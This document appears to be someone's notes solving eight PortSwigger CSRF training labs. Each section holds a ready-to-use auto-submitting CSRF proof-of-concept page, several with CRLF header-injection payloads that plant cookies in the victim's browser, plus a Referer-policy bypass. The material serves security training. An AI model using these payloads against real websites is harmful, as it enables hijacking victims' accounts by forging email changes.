Cross-site request forgery (CSRF)
https://portswigger.net/web-security/csrf
Lab: CSRF vulnerability with no defenses
This lab's email change functionality is vulnerable to CSRF.
There is no csrf protection.
POST /my-account/change-email -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Copy HTML
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://acd71f561e07ef5fc0553244005800ca.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab: CSRF where token validation depends on request method
This lab's email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.
There is weak csrf protection. We can bypass it with using another type of request.
POST /my-account/change-email HTTP/1.1
...
email=test%40test.com&csrf=sxvRDU1AMkOoKQAHggYlMxmYvwux8VQOGET /my-account/change-email?email=test1%40test.com&csrf= HTTP/1.1GET /my-account/change-email?email=test%40test.com&csrf= -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Copy HTML
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://accd1fbb1fb33923c06c165e00f800af.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="test2@test.com" />
<input type="hidden" name="csrf" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab: CSRF where token validation depends on token being present
This lab's email change functionality is vulnerable to CSRF.
There is no csrf validation.
POST /my-account/change-email HTTP/1.1
...
email=test%40test.com&csrf=qiYsensNMTrt6sEsrg3k34F8fcETA9fVPOST /my-account/change-email HTTP/1.1
...
email=test%40test.comPOST /my-account/change-email -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Copy HTML
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac051fad1fda0d08c0f81086001c006e.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab: CSRF where token is not tied to user session
This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't integrated into the site's session handling system.
There is weak csrf validation. It checks just legit one, not the relevant with the user.
POST /my-account/change-email HTTP/1.1
...
email=test%40test.com&csrf=JG7Q6mBICNYFzoyoV5hYpWtrNYd594P8<input required type="hidden" name="csrf" value="Y9fAYvcu20R4no9eYZW5xoMu5ArQu2yU">POST /my-account/change-email -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Replace CSRF value -> Copy HTML
We did not use intended one. We used unused csrf value.
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac0c1fb61ec9ef30c0fc378900d60097.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="hidden" name="csrf" value="Y9fAYvcu20R4no9eYZW5xoMu5ArQu2yU" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab: CSRF where token is tied to non-session cookie
This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's session handling system.
There is weak csrf validation. It checks just legit one, not the relevant with the user.
POST /my-account/change-email HTTP/1.1
Cookie: csrfKey=8I8n27eFyGpcdsZx0IclajLEbnlHnKby;
...
email=test%40test.com&csrf=fz9i4GYhEG7fmO2F1eH34fsTpsQ3vwlwWe obtained csrfKey and csrf value with an another user. So we can change email address with valid keys.
Obtained keys:
csrfKey=9Lz92TCDDpco7KZk7sH5s8DGsskKG9sZ; csrf value=qmTs9BViTSDgDcsP3zEJ12luELhW0VNT
We have to inject our csrfKey cookie to the user session.
In search function in website, we can see the way.
Search -> test
GET /?search=test HTTP/1.1
In response:
Set-Cookie: LastSearchTerm=test;There is no filter for search. So we can use search func to inject our csrfKey cookie value.
/?search=test%0d%0aSet-Cookie:%20csrfKey=9Lz92TCDDpco7KZk7sH5s8DGsskKG9sZ
In response:
Set-Cookie: csrfKey=9Lz92TCDDpco7KZk7sH5s8DGsskKG9sZ;POST /my-account/change-email -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Replace CSRF value -> Replace script part as follows -> Copy HTML
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac221fed1ff074fdc03c5eae004b002e.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="hidden" name="csrf" value="qmTs9BViTSDgDcsP3zEJ12luELhW0VNT" />
<input type="submit" value="Submit request" />
</form>
<img src="https://ac221fed1ff074fdc03c5eae004b002e.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=9Lz92TCDDpco7KZk7sH5s8DGsskKG9sZ" onerror="document.forms[0].submit()">
</body>
</html>Lab: CSRF where token is duplicated in cookie
This lab's email change functionality is vulnerable to CSRF. It attempts to use the insecure "double submit" CSRF prevention technique.
There is weak csrf validation. It checks just legit one, not the relevant with the user.
Search -> test
GET /?search=test HTTP/1.1
In response:
Set-Cookie: LastSearchTerm=test;/?search=test%0d%0aSet-Cookie:%20csrf=G2wTaO4fpWuGLL6dlBJvGBtzg7TSeDzk%0d%0aSet-Cookie:%20
POST /my-account/change-email HTTP/1.1
Cookie: csrf=G2wTaO4fpWuGLL6dlBJvGBtzg7TSeDzk; LastSearchTerm=test; session=XcWME6SyAyKgICamvlFjNT5ielLP0h45
...
email=test%40test.com&csrf=G2wTaO4fpWuGLL6dlBJvGBtzg7TSeDzkPOST /my-account/change-email -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Replace script part as follows -> Copy HTML
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://acea1f341e7613f6c0800a9100c9002e.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="hidden" name="csrf" value="G2wTaO4fpWuGLL6dlBJvGBtzg7TSeDzk" />
<input type="submit" value="Submit request" />
</form>
<img src="https://acea1f341e7613f6c0800a9100c9002e.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=G2wTaO4fpWuGLL6dlBJvGBtzg7TSeDzk%0d%0aSet-Cookie:%20" onerror="document.forms[0].submit()">
</body>
</html>Lab: CSRF where Referer validation depends on header being present
This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.
There is weak csrf validation. It checks just legit referer header.
POST /my-account/change-email HTTP/1.1
Referer: https://accc1f911e9210ebc0554ed9000a0090.web-security-academy.net/my-account
...
email=test3%40test.comWe got this error with using non-related domains at referer header: "Invalid referer header"
We deleted the referer header, then we could make the request successfully.
POST /my-account/change-email -> Engagements Tools -> CSRF PoC Generator -> Include Auto-Submit Script(checked) -> Regenerate -> Add the meta tag with contents -> Copy HTML
Exploit Server ->
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<meta name="referrer" content="no-referrer">
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://accc1f911e9210ebc0554ed9000a0090.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Lab: CSRF with broken Referer validation
This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.
There is weak csrf validation. It checks just legit referer header.
POST /my-account/change-email HTTP/1.1
Referer: https://ac3a1fd81f88743bc0a2729b00e700ad.web-security-academy.net/my-account
...
email=test%40test.comReferer: https://exploit-acf71f421f2374fec07372a7011e0077.web-security-academy.net/?ac3a1fd81f88743bc0a2729b00e700ad.web-security-academy.net
Exploit Server ->
Header:
Referrer-Policy: unsafe-url
Body:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/?ac3a1fd81f88743bc0a2729b00e700ad.web-security-academy.net')</script>
<form action="https://ac3a1fd81f88743bc0a2729b00e700ad.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Last updated